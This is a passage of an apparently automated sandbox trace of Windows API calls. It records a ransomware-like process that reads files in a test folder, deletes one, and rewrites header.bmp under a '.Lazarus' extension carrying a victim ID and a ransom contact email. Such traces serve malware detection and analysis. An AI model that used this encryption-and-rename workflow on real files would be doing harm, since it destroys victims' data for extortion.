nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.537] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.538] GetLastError () returned 0x0 [0076.538] SetLastError (dwErrCode=0x0) [0076.538] GetLastError () returned 0x0 [0076.538] SetLastError (dwErrCode=0x0) [0076.539] GetLastError () returned 0x0 [0076.539] SetLastError (dwErrCode=0x0) [0076.539] GetLastError () returned 0x0 [0076.539] SetLastError (dwErrCode=0x0) [0076.539] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x796, lpOverlapped=0x0) returned 1 [0076.539] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.539] GetLastError () returned 0x0 [0076.540] SetLastError (dwErrCode=0x0) [0076.540] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0076.540] GetLastError () returned 0x0 [0076.540] SetLastError (dwErrCode=0x0) [0076.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfa0 [0076.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0076.540] GetLastError () returned 0x0 [0076.540] SetLastError (dwErrCode=0x0) [0076.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0076.541] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x7a0, lpOverlapped=0x0) returned 1 [0076.541] GetLastError () returned 0x0 [0076.541] SetLastError (dwErrCode=0x0) [0076.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0076.541] GetLastError () returned 0x0 [0076.541] SetLastError (dwErrCode=0x0) [0076.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0076.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0076.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0076.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0076.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0076.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0076.542] CloseHandle (hObject=0x410) returned 1 [0076.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.543] CloseHandle (hObject=0x42c) returned 1 [0076.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0076.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0076.544] AreFileApisANSI () returned 1 [0076.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0076.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x6cf50, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0076.544] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.545] GetFileType (hFile=0x42c) returned 0x1 [0076.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0076.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.546] GetLastError () returned 0xb7 [0076.546] SetLastError (dwErrCode=0xb7) [0076.546] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0076.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.547] CloseHandle (hObject=0x42c) returned 1 [0076.547] AreFileApisANSI () returned 1 [0076.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0076.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0076.547] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x94680 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0076.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.549] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x2f0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ê", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧茐\x07̧비聐螘\x08賂̧")) returned 0 [0076.549] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0076.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0076.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.550] AreFileApisANSI () returned 1 [0076.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\header.bmp", lpUsedDefaultChar=0x0) returned 33 [0076.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0076.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0076.551] AreFileApisANSI () returned 1 [0076.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0076.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x690d0 [0076.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0076.551] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0076.551] GetFileType (hFile=0x428) returned 0x1 [0076.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0076.551] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0076.551] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0076.552] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0076.552] CloseHandle (hObject=0x428) returned 1 [0076.552] AreFileApisANSI () returned 1 [0076.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0076.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69210 [0076.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0076.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0076.552] GetFileType (hFile=0x428) returned 0x1 [0076.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0076.552] CloseHandle (hObject=0x428) returned 1 [0076.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0076.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.553] AreFileApisANSI () returned 1 [0076.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0076.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69350 [0076.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0076.553] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c)) returned 1 [0076.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0076.553] AreFileApisANSI () returned 1 [0076.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.554] GetLastError () returned 0x0 [0076.554] SetLastError (dwErrCode=0x0) [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x94680 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0076.554] GetLastError () returned 0x0 [0076.554] SetLastError (dwErrCode=0x0) [0076.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0076.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0076.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0076.554] AreFileApisANSI () returned 1 [0076.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0076.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0076.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=95 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 95 [0076.555] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\header.bmp.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0076.555] GetFileType (hFile=0x428) returned 0x1 [0076.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0076.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0076.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0076.555] AreFileApisANSI () returned 1 [0076.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0076.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68d60 [0076.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0076.555] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.555] GetFileType (hFile=0x42c) returned 0x1 [0076.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0076.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0076.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0076.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.556] GetLastError () returned 0x0 [0076.556] SetLastError (dwErrCode=0x0) [0076.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.556] GetLastError () returned 0x0 [0076.556] SetLastError (dwErrCode=0x0) [0076.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0076.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0076.556] ReadFile (in: hFile=0x42c, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, 